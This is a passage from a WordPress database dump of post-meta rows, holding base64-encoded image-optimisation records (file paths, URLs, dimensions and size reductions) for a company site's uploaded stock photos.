Vyc3RvY2tfNjEzNjk2MzMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODMyNTEsImlkIjo3Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODMyNTQsImlkIjo3Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODMyNTYsImlkIjo3Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODMyNTksImlkIjo3Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjEzNjk2MzMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODMyNjEsImlkIjo3Mzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30043, 731, 'wpfc_optimisation_reduction', '14926'); 
INSERT INTO `wp_postmeta` VALUES (30044, 731, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQuanBnIiwid2lkdGgiOjMwOTAsImhlaWdodCI6MjExMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzI2NiwiaWQiOiI3MzEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODk1LCJ0aW1lIjoxNDgzNTgzMjcwLCJpZCI6NzMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtODAweDU0Ni5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU0NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTgwMHg1NDYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC04MDB4NTQ2LmpwZyIsInJlZHVjdGlvbiI6MTQzMCwidGltZSI6MTQ4MzU4MzI3NCwiaWQiOjczMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTc2OHg1MjQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MjQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC03Njh4NTI0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtNzY4eDUyNC5qcGciLCJyZWR1Y3Rpb24iOjEzNzAsInRpbWUiOjE0ODM1ODMyNzgsImlkIjo3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0xNjAweDEwOTMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA5MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTE2MDB4MTA5My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTE2MDB4MTA5My5qcGciLCJyZWR1Y3Rpb24iOjMzMDYsInRpbWUiOjE0ODM1ODMyODMsImlkIjo3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo3MDksInRpbWUiOjE0ODM1ODMyODYsImlkIjo3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTcsInRpbWUiOjE0ODM1ODMyOTAsImlkIjo3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NTAsInRpbWUiOjE0ODM1ODMyOTMsImlkIjo3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDM0LCJ0aW1lIjoxNDgzNTgzMjk3LCJpZCI6NzMxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0ODUsInRpbWUiOjE0ODM1ODMzMDAsImlkIjo3MzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYxOSwidGltZSI6MTQ4MzU4MzMwNCwiaWQiOjczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTA1MCwidGltZSI6MTQ4MzU4MzMwNywiaWQiOjczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTE2NCwidGltZSI6MTQ4MzU4MzMxMSwiaWQiOjczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzM5OTkyMzQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzczOTk5MjM0LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3Mzk5OTIzNC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTM5NywidGltZSI6MTQ4MzU4MzMxNSwiaWQiOjczMX1d'); 
INSERT INTO `wp_postmeta` VALUES (30045, 730, 'wpfc_optimisation_reduction', '15254'); 
INSERT INTO `wp_postmeta` VALUES (30046, 730, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODkuanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzMyMCwiaWQiOiI3MzAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzEyLCJ0aW1lIjoxNDgzNTgzMzIzLCJpZCI6NzMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTQyNSwidGltZSI6MTQ4MzU4MzMyNywiaWQiOjczMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEzMzEsInRpbWUiOjE0ODM1ODMzMzEsImlkIjo3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjQ2MjksInRpbWUiOjE0ODM1ODMzMzYsImlkIjo3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NzAsInRpbWUiOjE0ODM1ODMzMzksImlkIjo3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzYsInRpbWUiOjE0ODM1ODMzNDIsImlkIjo3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudF